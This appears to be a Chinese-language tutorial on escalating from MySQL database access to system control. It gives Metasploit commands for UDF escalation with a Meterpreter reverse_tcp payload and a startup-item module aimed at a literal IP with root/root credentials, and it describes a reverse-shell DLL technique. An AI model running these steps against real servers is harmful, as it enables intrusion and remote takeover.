权限提升-MYSQL数据库提权

基础知识

1、需要了解掌握的权限？

后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等

2、权限获取方法简要归类说明？

后台权限：SQL注入,数据库备份泄露，默认或弱口令等获取帐号密码进入

网站权限：后台提升至网站权限，RCE或文件操作类、反序列化等漏洞直达Shell

数据库权限：SQL注入,数据库备份泄露，默认或弱口令等进入或网站权限获取后转入

接口权限：SQL注入,数据库备份泄露，源码泄漏，培植不当等或网站权限获取后转入

系统权限：高危系统漏洞直达或网站权限提升转入、数据库权限提升转入，第三方转入等

域控权限：高危系统漏洞直达或内网横向渗透转入，域控其他服务安全转入等

3、常见权限获取后能操作的具体事情?

后台权限:

常规WEB界面文章分类等操作，后台功能可操作类

网站权限：

查看或修改程序源代码，可以进行网站或应用的配置文件读取（接口配置信息，数据库配置信息等），还能收集服务器操作系统相关的信息，为后续系统提权做准备。

数据库权限：

操作数据库的权限，数据库的增删改等，源码或配置文件泄漏，也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。

接口权限：

后台或网站权限后的获取途径：后台（修改配置信息功能点），网站权限（查看的配置文件获取），具体可以操作的事情大家自己想想。

系统权限：如同在你自己操作自己的电脑一样

域控权限：如同在你自己操作自己的虚拟机一样

案例演示

MYSQL-UDF提权

概述：获取密码-开启外联-高版本创建目录-MSF导出dll-Webshell执行后续

查看数据库版本和安装目录，数据库版本的不同对应生成dll文件的目录也不同。

mysql<5.2 导出目录c:/windows或system32

mysql=>5.2 导出安装目录/lib/plugin/

 

 

利用MSF进行数据库的UDF提权

因为MYSQL数据库中的root用户默认不能外联，所以需要在利用数据库的命令开启外联。当执行完命令后，root用户前的表格出现了%时，证明可以任意主机链接。

 

使用MSF中的exploit/multi/mysql/mysql_udf_payload 模块可以进行UDF提权并设置账号密码

use exploit/multi/mysql/mysql_udf_payload

set payload windows/meterpreter/reverse_tcp

set 账号 密码

set rhosts 地址

run

 

 

用run进行链接。UDF模块提权会向目录里导入一个dll文件，而导入文件会插入到mysql库的func里。

 

那么在刚才说的目录中会出现一个dll文件(因为小编的数据库大于5版本，所以在plugin目录下，如果没有该目录手动创建即可)。

 

攻击者可以利用生成的dl文件提供的函数执行系统命令。

sys_eval，执行任意命令，并将输出返回。

sys_exec，执行任意命令，并将退出码返回。

sys_get，获取一个环境变量。

sys_set，创建或修改一个环境变量。

 

利用命令绑定sys_eval函数。查询绑定成功后，执行命令即可。

 

 

 

MYSQL启动项提权

利用msf启用该漏洞的对应模块模块，设置账号和密码。（注意：需要开启外联）

设置目标地址，设置allow为true，利用run直接跑即可

use exploit/windows/mysql/mysql_start_up

set rhosts 47.102.195.100

set username root

set password root

run

 

 

在数据库所在的系统中的启动目录生成了RoNuO执行文件，后续操作只要让msf监听端口和ip，等待目标服务器重启即可

 

 

 

MYSQL反弹shell

将代码利用mysql执行命令进行执行

代码解析：为@a赋值一个反弹shell的命令，创建一个Ghost表，将@a的值赋值，将Ghost表下载到lib下的plugin目录并生成dll文件，然后设置好ip和端口利用dll文件进行shell反弹。

 

在kali中执行对应的端口，执行后即可反弹

​​​​​​​